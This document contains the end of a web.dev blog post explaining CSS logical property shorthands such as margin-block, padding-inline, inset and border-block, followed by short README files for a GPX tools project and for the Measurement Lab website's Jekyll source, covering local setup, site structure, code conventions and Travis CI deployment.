MDN](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Flow_Layout) or in the [CSS Display Module spec](https://drafts.csswg.org/css-display-3/#out-of-flow). While logical properties are not required to be in flow, they do much of the heavy lifting for you as directionality changes. Flow implies direction, which letters, words and content need to travel along. This leads us to block and inline logical directions. Block direction is the direction that new content blocks follow, like asking yourself, "where to put the next paragraph?". You might think of it as a "content block", or "block of text". Every language arranges their blocks and orders them along their respective `block-axis`. `block-start` is the side a paragraph is first placed, while `block-end` is the side new paragraphs flow towards. **Key Term**: The _block direction_ is defined by the `writing-mode` property. For example, `horizontal-tb` (the initial value) has a vertical block axis that flows top-to-bottom (`tb`). Other values have an horizontal block axis, which can flow left-to-right (like in `vertical-lr`) or right-to-left (like in `vertical-rl`). In traditional Japanese handwriting, for example, block direction flows right to left: Inline direction is the direction that letters and words go. Consider the direction your arm and hand travel when you write; they are traveling along the `inline-axis`. `inline-start` is the side where you start writing, while `inline-end` is the side where writing ends or wraps. The above video, the `inline-axis` is top to bottom, but in this next video the `inline-axis` flows right to left. **Key Term**: The _inline direction_ is defined by both `writing-mode` and `direction`. For example, it flows left-to-right with `horizontal-tb` and `ltr`, right-to-left with `horizontal-tb` and `rtl`, top-to-bottom with `vertical-lr` and `ltr`, and bottom-to-top with `vertical-rl` and `rtl`. Being [`flow-relative`](https://www.w3.org/TR/css-writing-modes-4/#logical-directions) means that the styles written for one language will be contextual and appropriately applied into other languages. Content will flow relative to the language it's being delivered for. ## New shorthands <a href="#new-shorthands" class="w-headline-link">#</a> Some of the following shorthands are not new features for the browser, rather, easier ways to write styles by taking advantage of being able to set values on both block or inline edges at once. The `inset-*` logical properties **do** bring new abilities, as there were no longhand ways to specify absolute positions with logical properties before it. Insets and shorthands flow (hehe) together so well though, I'm going to tell you about all of the new logical properties features landing in Chromium 87 at once. ### Margin shorthands <a href="#margin-shorthands" class="w-headline-link">#</a> No new abilities shipped, but some super handy shorthands did: [`margin-block`](https://developer.mozilla.org/en-US/docs/Web/CSS/margin-block) and [`margin-inline`](https://developer.mozilla.org/en-US/docs/Web/CSS/margin-inline). **Caution**: If the above items do not have space between them, then `margin-block` shorthand is not supported in your browser. Longhand margin-block-start: 2ch; margin-block-end: 2ch; New shorthand margin-block: 2ch; /* or */ margin-block: 2ch 2ch; There is no shorthand for "top and bottom" or "left and right"… until now! You probably reference all 4 sides using the shorthand of `margin: 10px;`, and now you can easily reference 2 complimentary sides by using the logical property shorthand. Longhand margin-inline-start: 4ch; margin-inline-end: 2ch; New shorthand margin-inline: 4ch 2ch; ### Padding shorthands <a href="#padding-shorthands" class="w-headline-link">#</a> No new abilities shipped, but more super handy shorthands did: [`padding-block`](https://developer.mozilla.org/en-US/docs/Web/CSS/padding-block) and [`padding-inline`](https://developer.mozilla.org/en-US/docs/Web/CSS/padding-inline). Longhand padding-block-start: 2ch; padding-block-end: 2ch; New shorthand padding-block: 2ch; /* or */ padding-block: 2ch 2ch; And the `inline` complimentary set of shorthands: Longhand padding-inline-start: 4ch; padding-inline-end: 2ch; New shorthand padding-inline: 4ch 2ch; ### Inset and shorthands <a href="#inset-and-shorthands" class="w-headline-link">#</a> The physical properties `top`, `right`, `bottom` and `left` can all be written as values for the `inset` property. Any value of `position` can benefit from setting sides with inset. .cover { position: absolute; top: 0; right: 0; bottom: 0; left: 0; inset: 0; } Physical longhand position: absolute; top: 1px; right: 2px; bottom: 3px; left: 4px; New physical shorthand position: absolute; inset: 1px 2px 3px 4px; That should look immediately convenient! Inset is shorthand for the physical sides, and it works just like margin and padding. #### New features <a href="#new-features" class="w-headline-link">#</a> As exciting as the physical sides shorthand is, there's even more from the logical features brought by additional `inset` shorthands. These shorthands bring developer authoring convenience (they're shorter to type) but also increase the potential reach for the layout because they're flow-relative. Physical longhand position: absolute; top: 10px; bottom: 10px; Logical shorthand position: absolute; inset-block: 10px; Physical longhand position: absolute; left: 10px; right: 20px; Logical shorthand position: absolute; inset-inline: 10px 20px; Further reading and a [full list of inset shorthand and longhand](https://developer.mozilla.org/en-US/docs/Web/CSS/inset) is available on MDN. ### Border shorthands <a href="#border-shorthands" class="w-headline-link">#</a> Border, plus its nested `color`, `style`, and `width` properties have all got new logical shorthands as well. Physical longhand border-top-color: hotpink; border-bottom-color: hotpink; Logical shorthand border-block-color: hotpink; /* or */ border-block-color: hotpink hotpink; Physical longhand border-left-style: dashed; border-right-style: dashed; Logical shorthand border-inline-style: dashed; /* or */ border-inline-style: dashed dashed; Physical longhand border-left-width: 1px; border-right-width: 1px; Logical shorthand border-inline-width: 1px; /* or */ border-inline-width: 1px 1px; Further reading and a [full list of border shorthand and longhand](https://developer.mozilla.org/en-US/docs/Web/CSS/border-block) is available on MDN. ## Logical property `<figure>` example <a href="#logical-property-lessfiguregreater-example" class="w-headline-link">#</a> Let's put it all together in a small example. Logical properties can layout an image with a caption to handle different writing and document directions. Or try it! You don't have to do much to make a card internationally responsive with a `<figure>` and a few logical properties. If you're curious how all this internationally considerate CSS works together, I hope this is a small meaningful introduction. ### Polyfilling and cross-browser support <a href="#browser-compatibility" class="w-headline-link">#</a> The Cascade or build tools are viable options to have old and new browsers alike, properly spaced with updated logical properties. For Cascade fallbacks, follow a physical property with a logical one and the browser will use the "last" property it found during style resolution. p { /* for unsupporting browsers */ margin-top: 1ch; margin-bottom: 2ch; /* for supporting browsers to use */ /* and unsupporting browsers to ignore and go 🤷‍♂️ */ margin-block: 1ch 2ch; } That's not quite a full solution for everyone though. Here's a handwritten fallback that leverages the `:lang()` pseudo-selector to target specific languages, adjusts their physical spacing appropriately, then at the end offers the logical spacing for supporting browsers: /* physical side styles */ p { margin-top: 1ch; margin-bottom: 2ch; } /* adjusted physical side styles per language */ :lang(ja) { p { /* zero out styles not useful for traditional Japanese */ margin-top: 0; margin-bottom: 0; /* add appropriate styles for traditional Japanese */ margin-right: 1ch; margin-left: 2ch; } } /* add selectors and adjust for languages all supported */ :lang(he) {…} :lang(mn) {…} /* Logical Sides */ /* Then, for supporting browsers to use */ /* and unsupporting browsers to ignore #TheCascade */ p { /* remove any potential physical cruft.. */ margin: 0; /* explicitly set logical value */ margin-block: 1ch 2ch; } You could also use `@supports` to determine whether or not to provide physical property fallbacks: p { margin-top: 1ch; margin-bottom: 2ch; } @supports (margin-block: 0) { p { margin-block: 1ch 2ch; } } [Sass](https://sass-lang.com), [PostCSS](https://github.com/csstools/postcss-logical), [Emotion](https://emotion.sh) and others have automated bundler and/or build time offerings that have a wide array of fallbacks or solutions. Check out each one to see which matches your toolchain and overall site strategy. ## What's next <a href="#what&#39;s-next" class="w-headline-link">#</a> More of CSS will offer logical properties, it's not done yet! There's one big missing set of shorthands though, and a resolution is still pending in this [Github issue](https://github.com/w3c/csswg-drafts/issues/1282). There is a temporary solution [in a draft](https://drafts.csswg.org/css-logical/#logical-shorthand-keyword). What if you want to style all logical sides of a box with a shorthand? Physical shorthand margin: 1px 2px 3px 4px; margin: 1px 2px; margin: 2px; Logical shorthand margin: logical 1px 2px 3px 4px; margin: logical 1px 2px; margin: logical 2px; The current draft proposal would mean you have to write `logical` in every shorthand in order to get the logical equivalent applied, which doesn't sound very [DRY](https://en.wikipedia.org/wiki/Don%27t_repeat_yourself) to some. There are other proposals to change it at the block or page level, but that could leak logical uses into styles still assuming physical sides. html { flow-mode: physical; /* or */ flow-mode: logical; /* now all margin/padding/etc references are logical */ } /* hopefully no 3rd/1st party code is hard coded to top/left/etc ..? */ It's a tough one! Cast your vote, voice your opinion, we want to hear from you. Want to learn or study logical properties more? Here's a detailed reference, along with guides and examples, [on MDN](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Logical_Properties) 🤓 ## Feedback <a href="#feedback" class="w-headline-link">#</a> - To propose changes to the CSS syntax of flow-relative shorthands, first [check the existing issues](https://github.com/w3c/csswg-drafts/labels/css-logical-1) on the csswg-drafts repository. If none of the existing issues match your proposal, [create a new issue](https://github.com/w3c/csswg-drafts/issues/new?title=%5Bcss-logical-1%5D). - To report bugs on Chromium's implementation of flow-relative shorthands, first [check the existing issues](https://bugs.chromium.org/p/chromium/issues/list?q=component%3ABlink%3ECSS%20logical&can=2) on Chromium Bug Tracker. If none of the existing issues match your bug, [create a new issue](https://bugs.chromium.org/p/chromium/issues/entry?components=Blink%3ECSS). <a href="/tags/css/" class="w-chip">CSS</a> <a href="/tags/layout/" class="w-chip">Layout</a> <span class="w-mr--sm"> Last updated: Oct 13, 2020 </span> [Improve article](https://github.com/GoogleChrome/web.dev/blob/master/src/site/content/en/blog/logical-property-shorthands/index.md) <a href="/blog" class="w-article-navigation__link w-article-navigation__link--back w-article-navigation__link--single gc-analytics-event">Return to all articles</a> - ### Contribute - <a href="https://github.com/GoogleChrome/web.dev/issues/new?assignees=&amp;labels=bug&amp;template=bug_report.md&amp;title=" class="w-footer__linkbox-link">File a bug</a> - <a href="https://github.com/googlechrome/web.dev" class="w-footer__linkbox-link">View source</a> - ### Related content - <a href="https://blog.chromium.org/" class="w-footer__linkbox-link">Chrome updates</a> - <a href="https://developers.google.com/web/" class="w-footer__linkbox-link">Web Fundamentals</a> - <a href="https://developers.google.com/web/showcase/" class="w-footer__linkbox-link">Case studies</a> - <a href="https://devwebfeed.appspot.com/" class="w-footer__linkbox-link">DevWeb Content Firehose</a> - <a href="/podcasts/" class="w-footer__linkbox-link">Podcasts</a> - <a href="/shows/" class="w-footer__linkbox-link">Shows</a> - ### Connect - <a href="https://www.twitter.com/@ChromiumDev" class="w-footer__linkbox-link">Twitter</a> - <a href="https://www.youtube.com/user/ChromeDevelopers" class="w-footer__linkbox-link">YouTube</a> <a href="https://developers.google.com/" class="w-footer__utility-logo-link"><img src="/images/lockup-color.png" alt="Google Developers" class="w-footer__utility-logo" width="185" height="33" /></a> - <a href="https://developer.chrome.com/home" class="w-footer__utility-link">Chrome</a> - <a href="https://firebase.google.com/" class="w-footer__utility-link">Firebase</a> - <a href="https://cloud.google.com/" class="w-footer__utility-link">Google Cloud Platform</a> - <a href="https://developers.google.com/products" class="w-footer__utility-link">All products</a> <!-- --> - <a href="https://policies.google.com/" class="w-footer__utility-link">Terms &amp; Privacy</a> - <a href="/community-guidelines/" class="w-footer__utility-link">Community Guidelines</a> Except as otherwise noted, the content of this page is licensed under the [Creative Commons Attribution 4.0 License](https://creativecommons.org/licenses/by/4.0/), and code samples are licensed under the [Apache 2.0 License](https://www.apache.org/licenses/LICENSE-2.0). For details, see the [Google Developers Site Policies](https://developers.google.com/site-policies).
66.15404
2,295
0.743482
eng_Latn
0.807797
5381668d0f2dba279649f465bd996cab571d4a96
21
md
Markdown
README.md
cedeber/spurilo
14c2c8184a7c48a0b9ef2b03b0050e6207760f8c
[ "Unlicense" ]
null
null
null
README.md
cedeber/spurilo
14c2c8184a7c48a0b9ef2b03b0050e6207760f8c
[ "Unlicense" ]
null
null
null
README.md
cedeber/spurilo
14c2c8184a7c48a0b9ef2b03b0050e6207760f8c
[ "Unlicense" ]
null
null
null
# Spurilo GPX Tools
5.25
9
0.714286
eng_Latn
0.317819
53817312f7948735ddf86a0787ddb37fa88cd4cb
145
md
Markdown
content/artists/stef-mitchell/index.md
AaratiAkkapeddi/ap-studio
844f122fa7081842a13176d9e5db832f7bc0e2b7
[ "0BSD" ]
1
2022-01-08T19:50:44.000Z
2022-01-08T19:50:44.000Z
content/artists/stef-mitchell/index.md
AaratiAkkapeddi/ap-studio
844f122fa7081842a13176d9e5db832f7bc0e2b7
[ "0BSD" ]
2
2021-12-25T00:46:06.000Z
2022-02-05T04:00:03.000Z
content/artists/stef-mitchell/index.md
AaratiAkkapeddi/ap-studio
844f122fa7081842a13176d9e5db832f7bc0e2b7
[ "0BSD" ]
null
null
null
--- id: 9ee82a14-9bd1-4eeb-a178-a161573852e3 title: Stef Mitchell name: Stef Mitchell featured_project: 15b20378-8a42-4178-b21d-a8e10d3b550e ---
20.714286
54
0.793103
eng_Latn
0.177973
5381ab2fd82c0e9c8ae19c3ea8ad069eb8b27f66
1,132
md
Markdown
2017/CVE-2017-0300.md
justinforbes/cve
375c65312f55c34fc1a4858381315fe9431b0f16
[ "MIT" ]
2,340
2022-02-10T21:04:40.000Z
2022-03-31T14:42:58.000Z
2017/CVE-2017-0300.md
justinforbes/cve
375c65312f55c34fc1a4858381315fe9431b0f16
[ "MIT" ]
19
2022-02-11T16:06:53.000Z
2022-03-11T10:44:27.000Z
2017/CVE-2017-0300.md
justinforbes/cve
375c65312f55c34fc1a4858381315fe9431b0f16
[ "MIT" ]
280
2022-02-10T19:58:58.000Z
2022-03-26T11:13:05.000Z
### [CVE-2017-0300](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0300) ![](https://img.shields.io/static/v1?label=Product&message=Microsoft%20Windows&color=blue) ![](https://img.shields.io/static/v1?label=Version&message=n%2Fa&color=blue) ![](https://img.shields.io/static/v1?label=Vulnerability&message=Information%20Disclosure&color=brighgreen) ### Description The kernel in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an authenticated attacker to obtain information via a specially crafted application. aka "Windows Kernel Information Disclosure Vulnerability," a different vulnerability than CVE-2017-8491, CVE-2017-8490, CVE-2017-8489, CVE-2017-8488, CVE-2017-8485, CVE-2017-8483, CVE-2017-8482, CVE-2017-8481, CVE-2017-8480, CVE-2017-8478, CVE-2017-8479, CVE-2017-8476, CVE-2017-8474, CVE-2017-8469, CVE-2017-8462, CVE-2017-0299, and CVE-2017-0297. ### POC #### Reference - https://www.exploit-db.com/exploits/42244/ #### Github No PoCs found on GitHub currently.
62.888889
636
0.759717
eng_Latn
0.200352
538200bd5499cd892bda0d0e599a6534b2ff798d
11,293
md
Markdown
docs/2014/relational-databases/replication/publish/specify-schema-options.md
ZubriQ/sql-docs.ru-ru
50559946dabe5fce9eef251a637dc2e3fd305908
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/2014/relational-databases/replication/publish/specify-schema-options.md
ZubriQ/sql-docs.ru-ru
50559946dabe5fce9eef251a637dc2e3fd305908
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/2014/relational-databases/replication/publish/specify-schema-options.md
ZubriQ/sql-docs.ru-ru
50559946dabe5fce9eef251a637dc2e3fd305908
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Указание параметров схемы | Документация Майкрософт ms.custom: '' ms.date: 06/13/2017 ms.prod: sql-server-2014 ms.reviewer: '' ms.technology: replication ms.topic: conceptual helpviewer_keywords: - schemas [SQL Server replication], options - articles [SQL Server replication], transactional replication options - articles [SQL Server replication], merge replication options - articles [SQL Server replication], schema options ms.assetid: 1f85a479-bd6e-4023-abf7-7435a7e5b567 author: MashaMSFT ms.author: mathoma manager: craigg ms.openlocfilehash: e6826d28ec923de221e94b985b740a172bdaa7d5 ms.sourcegitcommit: e042272a38fb646df05152c676e5cbeae3f9cd13 ms.translationtype: MT ms.contentlocale: ru-RU ms.lasthandoff: 04/27/2020 ms.locfileid: "73882165" --- # <a name="specify-schema-options"></a>Указание параметров схемы В этом разделе описывается указание параметров схемы в [!INCLUDE[ssCurrent](../../../includes/sscurrent-md.md)] с помощью среды [!INCLUDE[ssManStudioFull](../../../includes/ssmanstudiofull-md.md)] или [!INCLUDE[tsql](../../../includes/tsql-md.md)]. При публикации таблицы или представления можно управлять параметрами создания объектов, применяемых к опубликованному объекту. Эти параметры можно задать при создании статьи, а также изменить их позднее. Если эти параметры не заданы в явном виде, то применяется набор параметров по умолчанию. > [!NOTE] > Параметры схемы по умолчанию при использовании хранимых процедур репликации могут отличаться от параметров по умолчанию, применяемых для добавления статей с помощью среды [!INCLUDE[ssManStudioFull](../../../includes/ssmanstudiofull-md.md)]. **В этом разделе** - **Перед началом работы** [Ограничения](#Restrictions) [Рекомендации](#Recommendations) - **Для указания параметров схемы используется:** [Среда SQL Server Management Studio](#SSMSProcedure) [Transact-SQL](#TsqlProcedure) ## <a name="before-you-begin"></a><a name="BeforeYouBegin"></a> Перед началом ### <a name="limitations-and-restrictions"></a><a name="Restrictions"></a> Ограничения - Если изменить параметры схемы после создания публикации, то необходимо создать новый моментальный снимок. ### <a name="recommendations"></a><a name="Recommendations"></a> Рекомендации - Полный список параметров схемы см. в ** \@разделе schema_option** параметр [sp_addarticle &#40;Transact-SQL&#41;](/sql/relational-databases/system-stored-procedures/sp-addarticle-transact-sql) и [sp_addmergearticle &#40;Transact-SQL&#41;](/sql/relational-databases/system-stored-procedures/sp-addmergearticle-transact-sql). ## <a name="using-sql-server-management-studio"></a><a name="SSMSProcedure"></a> Использование среды SQL Server Management Studio На вкладке **Свойства** диалогового окна **Свойства статьи - \<статья>** задайте параметры схемы, например укажите, необходимо ли копировать ограничения и триггеры для подписчиков. Эта вкладка доступна в мастере создания публикаций, а также в диалоговом окне **Свойства публикации - \<публикация>** . Дополнительные сведения об использовании мастера и доступе к этому диалоговому окну см. в статьях [Создание публикации](create-a-publication.md) и [Просмотр и изменение свойств публикации](view-and-modify-publication-properties.md). #### <a name="to-specify-schema-options"></a>Указание параметров схемы 1. На странице **Статьи** мастера создания публикаций или в диалоговом окне **Свойства публикации - \<публикация>** выберите нужную статью и щелкните **Свойства статьи**. 2. Выберите статьи, для которых необходимо внести изменения в параметры схемы: - Щелкните **Указать свойства выделенной статьи \<тип_объекта>** , чтобы открыть диалоговое окно **Свойства статьи — \<имя_объекта>** . Изменения, внесенные в этом диалоговом окне, применяются только к объекту, который будет выделен на панели объектов на странице **Статьи**. - Щелкните **Указать свойства всех статей \<тип_объекта>** , чтобы открыть диалоговое окно **Свойства всех статей \<тип_объекта>** . Изменения свойств, внесенные в этом диалоговом окне, применяются ко всем объектам этого типа на панели объектов на странице **Статьи**, включая объекты, не выбранные для публикации. > [!NOTE] > Изменения свойств, внесенные в диалоговом окне **Свойства всех статей \<тип_объекта>** переопределяют изменения, сделанные ранее в диалоговом окне **Свойства статьи — \<имя_объекта>** . Например, если нужно установить некоторое количество значений по умолчанию для всех статей типа объекта, но при этом задать некоторые свойства для отдельных объектов, сначала установите значения по умолчанию для всех статей. Затем установите свойства для отдельных объектов. 3. Укажите значения параметров в разделах **Копировать объекты и установки на подписчик** и **Целевой объект** на вкладке **Свойства** диалогового окна **Свойства статьи - \<статья>** . 4. Измените свойства, если необходимо, и нажмите кнопку **ОК**. 5. Если вы находитесь в диалоговом окне **Свойства публикации — \<публикация>** , нажмите кнопку **ОК**, чтобы сохранить изменения и закрыть диалоговое окно. ## <a name="using-transact-sql"></a><a name="TsqlProcedure"></a> Использование Transact-SQL Параметры схемы указываются в виде шестнадцатеричных значений, которые являются результатом выполнения операции [| (побитовое ИЛИ)](/sql/t-sql/language-elements/bitwise-or-transact-sql) к одному или нескольким параметрам. Дополнительные сведения см. в разделах [sp_addarticle](/sql/relational-databases/system-stored-procedures/sp-addarticle-transact-sql) и [sp_addmergearticle](/sql/relational-databases/system-stored-procedures/sp-addmergearticle-transact-sql). > [!NOTE] > Прежде чем применять битовые операции к значениям параметров схемы, необходимо преобразовать их значения из типа **binary** в тип **int** . Дополнительные сведения см. в разделе [Функции CAST и CONVERT (Transact-SQL)](/sql/t-sql/functions/cast-and-convert-transact-sql). #### <a name="to-specify-schema-options-when-defining-an-article-for-a-snapshot-or-transactional-publication"></a>Задание параметров схемы при определении статьи для публикации моментальных снимков или транзакций 1. Выполните процедуру [sp_addarticle](/sql/relational-databases/system-stored-procedures/sp-addarticle-transact-sql)на издателе в базе данных публикации. Укажите имя публикации, которой принадлежит статья для ** \@публикации**, имя статьи для ** \@статьи**, публикуемый объект базы данных для ** \@source_object**, тип объекта базы данных для ** \@типа**и объект [| (Побитовое или)](/sql/t-sql/language-elements/bitwise-or-transact-sql) результат одного или нескольких параметров схемы для ** \@schema_option**. Дополнительные сведения см. в статье [определить статью](define-an-article.md). #### <a name="to-specify-schema-options-when-defining-an-article-for-a-merge-publication"></a>Задание параметров схемы при определении статьи для публикации слиянием 1. В базе данных публикации на издателе выполните процедуру [sp_addmergearticle](/sql/relational-databases/system-stored-procedures/sp-addmergearticle-transact-sql). Укажите имя публикации, которой принадлежит статья для ** \@публикации**, имя статьи для ** \@статьи**, публикуемый объект базы данных для ** \@source_object**и [| (Побитовое или)](/sql/t-sql/language-elements/bitwise-or-transact-sql) результат одного или нескольких параметров схемы для ** \@schema_option**. Дополнительные сведения см. в статье [определить статью](define-an-article.md). #### <a name="to-change-schema-options-for-an-existing-article-in-a-snapshot-or-transactional-publication"></a>Изменение параметров схемы в существующей статье публикации моментальных снимков или транзакций 1. В базе данных публикации на издателе выполните процедуру [sp_helparticle](/sql/relational-databases/system-stored-procedures/sp-helparticle-transact-sql). Укажите имя публикации, которой принадлежит статья для ** \@публикации** , и имя статьи для ** \@статьи**. Запомните значение столбца **schema_option** в результирующем наборе. 2. Чтобы определить, установлен ли определенный параметр, выполните операцию [побитового сложения (&)](/sql/t-sql/language-elements/bitwise-and-transact-sql) требуемого значения параметра схемы со значением, полученным на шаге 1. - Если результат равен **0**, параметр не установлен. - Если результатом является значение параметра, то он уже установлен. 3. Если параметр не установлен, выполните операцию [| (побитовое ИЛИ)](/sql/t-sql/language-elements/bitwise-or-transact-sql) , используя значение из шага 1 и требуемое значение параметра схемы. 4. Выполните процедуру [sp_changearticle](/sql/relational-databases/system-stored-procedures/sp-changearticle-transact-sql)на издателе в базе данных публикации. Укажите имя публикации, которой принадлежит статья для ** \@публикации**, имя статьи для ** \@статьи**, значение **schema_option** для ** \@свойства**и шестнадцатеричный результат из шага 3 в качестве ** \@значения**. 5. Запустите агент моментальных снимков, чтобы создать новый моментальный снимок. Дополнительные сведения см. в разделе [Create and Apply the Initial Snapshot](../create-and-apply-the-initial-snapshot.md). #### <a name="to-change-schema-options-for-an-existing-article-in-a-merge-publication"></a>Изменение параметров схемы для существующей статьи в публикации слиянием 1. В базе данных публикации на издателе выполните процедуру [sp_helpmergearticle](/sql/relational-databases/system-stored-procedures/sp-helpmergearticle-transact-sql). Укажите имя публикации, которой принадлежит статья для ** \@публикации** , и имя статьи для ** \@статьи**. Запомните значение столбца **schema_option** в результирующем наборе. 2. Чтобы определить, установлен ли определенный параметр, выполните операцию [побитового сложения (&)](/sql/t-sql/language-elements/bitwise-and-transact-sql) требуемого значения параметра схемы со значением, полученным на шаге 1. - Если результат равен **0**, параметр не установлен. - Если результатом является значение параметра, то он уже установлен. 3. Если параметр не установлен, выполните операцию [| (побитовое ИЛИ)](/sql/t-sql/language-elements/bitwise-or-transact-sql) , используя значение из шага 1 и требуемое значение параметра схемы. 4. В базе данных публикации на издателе выполните процедуру [sp_changemergearticle](/sql/relational-databases/system-stored-procedures/sp-changemergearticle-transact-sql). Укажите имя публикации, которой принадлежит статья для ** \@публикации**, имя статьи для ** \@статьи**, значение **schema_option** для ** \@свойства**и шестнадцатеричный результат из шага 3 в качестве ** \@значения**. 5. Запустите агент моментальных снимков, чтобы создать новый моментальный снимок. Дополнительные сведения см. в разделе [Create and Apply the Initial Snapshot](../create-and-apply-the-initial-snapshot.md). ## <a name="see-also"></a>См. также: [Публикация данных и объектов базы данных](publish-data-and-database-objects.md) [Article Options for Transactional Replication](../transactional/article-options-for-transactional-replication.md)
88.226563
595
0.763482
rus_Cyrl
0.865466
538231db3f97af4cb4b87293bedb4131f38ce0d9
2,048
md
Markdown
projects/kubernetes-csi/external-snapshotter/README.md
DanielQujun/eks-distro
c6de425a2fea2ecef06c463e425f63d734125d64
[ "Apache-2.0" ]
1
2022-01-24T09:57:43.000Z
2022-01-24T09:57:43.000Z
projects/kubernetes-csi/external-snapshotter/README.md
DanielQujun/eks-distro
c6de425a2fea2ecef06c463e425f63d734125d64
[ "Apache-2.0" ]
null
null
null
projects/kubernetes-csi/external-snapshotter/README.md
DanielQujun/eks-distro
c6de425a2fea2ecef06c463e425f63d734125d64
[ "Apache-2.0" ]
null
null
null
## CSI external-snapshotter | Release | Version | | --- | --- | | 1-18 | ![Version](https://img.shields.io/badge/version-v3.0.3-blue) | | 1-19 | ![Version](https://img.shields.io/badge/version-v3.0.3-blue) | | 1-20 | ![Version](https://img.shields.io/badge/version-v3.0.3-blue) | | 1-21 | ![Version](https://img.shields.io/badge/version-v3.0.3-blue) | ### Updating 1. Determine the version of CSI external-snapshotter to use. 1. Consult the EKS team and consider options among the [supported versions](https://kubernetes-csi.github.io/docs/external-snapshotter.html#supported-versions). 2. Review [releases](https://github.com/kubernetes-csi/external-snapshotter/releases), [tags](https://github.com/kubernetes-csi/external-snapshotter/tags), and [changelogs](https://github.com/kubernetes-csi/external-snapshotter/tree/master/CHANGELOG), carefully looking for updates that may affect EKS-Distro or downstream projects like EKS-Anywhere. 2. Update the `GIT_TAG` file to have the new, desired version based on the `external-snapshotter` release tags. 3. Compare the old tag to the new one, looking specifically for Makefile changes. For example: [v3.0.3 compared to v4.2.0](https://github.com/kubernetes-csi/external-snapshotter/compare/v3.0.3...v4.2.0). Check the `external-snapshotter` target for any build flag changes, tag changes, dependencies, etc. Check that the manifest target, which is called from the EKS-D Makefile, has not changed. 4. Verify the Golang version has not changed. The version specified in [`go.mod`](https://github.com/kubernetes-csi/external-snapshotter/blob/master/go.mod) seems to be kept up to date. Be sure to select the correct branch for the release when checking the Golang version. 5. Update CHECKSUMS and attribution by using `make update-attribution-checksums-docker PROJECT=kubernetes-csi/external-snapshotter RELEASE_BRANCH=<release_branch>` from the root of the EKS-Distro repo. 6. Update the version at the top of this README.
55.351351
122
0.736816
eng_Latn
0.742099
53828e844e42574222ac71a13db1fbabf7d619a0
576
md
Markdown
includes/app-service-web-create-resource-group-linux.md
simba83/azure-docs.sv-se
028021e0d8a2cf4ea654c4d4016ebb9a601b95b0
[ "CC-BY-4.0", "MIT" ]
null
null
null
includes/app-service-web-create-resource-group-linux.md
simba83/azure-docs.sv-se
028021e0d8a2cf4ea654c4d4016ebb9a601b95b0
[ "CC-BY-4.0", "MIT" ]
null
null
null
includes/app-service-web-create-resource-group-linux.md
simba83/azure-docs.sv-se
028021e0d8a2cf4ea654c4d4016ebb9a601b95b0
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: inkludera fil description: inkludera fil services: app-service author: cephalin ms.service: app-service ms.topic: include ms.date: 08/20/2018 ms.author: cephalin ms.custom: include file ms.openlocfilehash: 02a6b88dfb37be41a4da8b35d7c524b905ceed8d ms.sourcegitcommit: eb6bef1274b9e6390c7a77ff69bf6a3b94e827fc ms.translationtype: MT ms.contentlocale: sv-SE ms.lasthandoff: 10/05/2020 ms.locfileid: "67187994" --- ## <a name="create-a-resource-group"></a>Skapa en resursgrupp [!INCLUDE [resource group no heading](app-service-web-create-resource-group-linux-no-h.md)]
28.8
91
0.800347
eng_Latn
0.172233
5382b2349698edec6276d7e2793f563ae0dee8ac
3,731
md
Markdown
README.md
mtlynch/m-lab.github.io-2
086e59ca0d59a35aa8ad3fc6b80376adc2cda716
[ "Apache-2.0" ]
null
null
null
README.md
mtlynch/m-lab.github.io-2
086e59ca0d59a35aa8ad3fc6b80376adc2cda716
[ "Apache-2.0" ]
null
null
null
README.md
mtlynch/m-lab.github.io-2
086e59ca0d59a35aa8ad3fc6b80376adc2cda716
[ "Apache-2.0" ]
null
null
null
# [Measurement Lab](http://www.measurementlab.net/) Source Code This is the source code of the Measurement Lab website built using [Jekyll](http://jekyllrb.com) and utilizing [GitHub Pages](https://pages.github.com/) to publish and host the site. Current Build Status is: [![Build Status](https://secure.travis-ci.org/m-lab/m-lab.github.io.png?branch=master)](http://travis-ci.org/m-lab/m-lab.github.io) ## Local Development **Please Note** This repository contains a submodule, so after cloning this repo, you will also need to run `git submodule init` and `git submodule update` to pull down the submodule files as well. 1. Install dependencies `bundle install` 2. Run Jekyll server and pass in a blank baseurl to preview in development mode `jekyll serve --baseurl`. 3. View the generated site by going to [http://localhost:4000/](http://localhost:4000/) ### HTML Compression This site enables HTML Compression for optimizing performance. If it is desired to not compress pages while doing development, developers can simply remove the ``layout: compress`` from the default template in the _layouts folder. ## Site Structure | Directory | Description | | ------------- |:------------- | | _data | Directory contains yml files that contain content that is not within individual pages or posts. | | _includes | Contains several partials that are common to several generated pages. | | _layouts | Contains the templates that are used to generate the commonality of the pages (default is the main one that all the pages use. | | _pages | Contains all non-blog post pages. Pages that have a number prepended to the filename signifies that they are used to dynamically generate the main navigational header. They will display in the header in the order of the prepended numbers. These pages also must contain the `menu-item: true` frontmatter in the pages. | | _posts | Contains all of the individual blog entries. | | css | Contains the css for the project. | | fonts | Contains the customized font libraries for the project. | | js | Contains the js libraries for the project. | | images | Contains all the image files for the site | | publications | Contains all the pdfs and docs that the site links too | ## Code Standards This section highlights the coding standards to be used for this project to ensure consistency across the codebase for current and future development ### Filename conventions - Should be all lowercase and words are concatenated with a hypen ### Variable naming conventions - All yml frontmatter keys should be lowercase and words concatenated with a hyphen ### Liquid - All liquid variables are following an underscore pattern so they can be easier to differentiate from yml frontmatter variables - All liquid tags, objects, and filtesr will have spaces in front of and following whatever is contained within braces ### Travis CI integration Travis is configured (via .travis.yml) to take the following actions after a push: - Build a static Jekyll site from the source. - Deploy the built site to Amazon S3. In order to [deploy to S3](https://docs.travis-ci.com/user/deployment/s3/), the secret key for the Amazon AWS [IAM account](https://aws.amazon.com/iam/) to be used must be encrypted in .travis.yml. The secret key is [encrypted]( https://docs.travis-ci.com/user/encryption-keys/) using the public key for the repository in Travis CI. If the Amazon credentials change, then the keys in .travis.yml will need to be updated. The ```access_key_id``` can be entered in plain text, but the secret key should be encryped using the [travis CLI utility](https://github.com/travis-ci/travis.rb) like so: ```$ travis encrypt secret_access_key:<SECRET KEY> -r 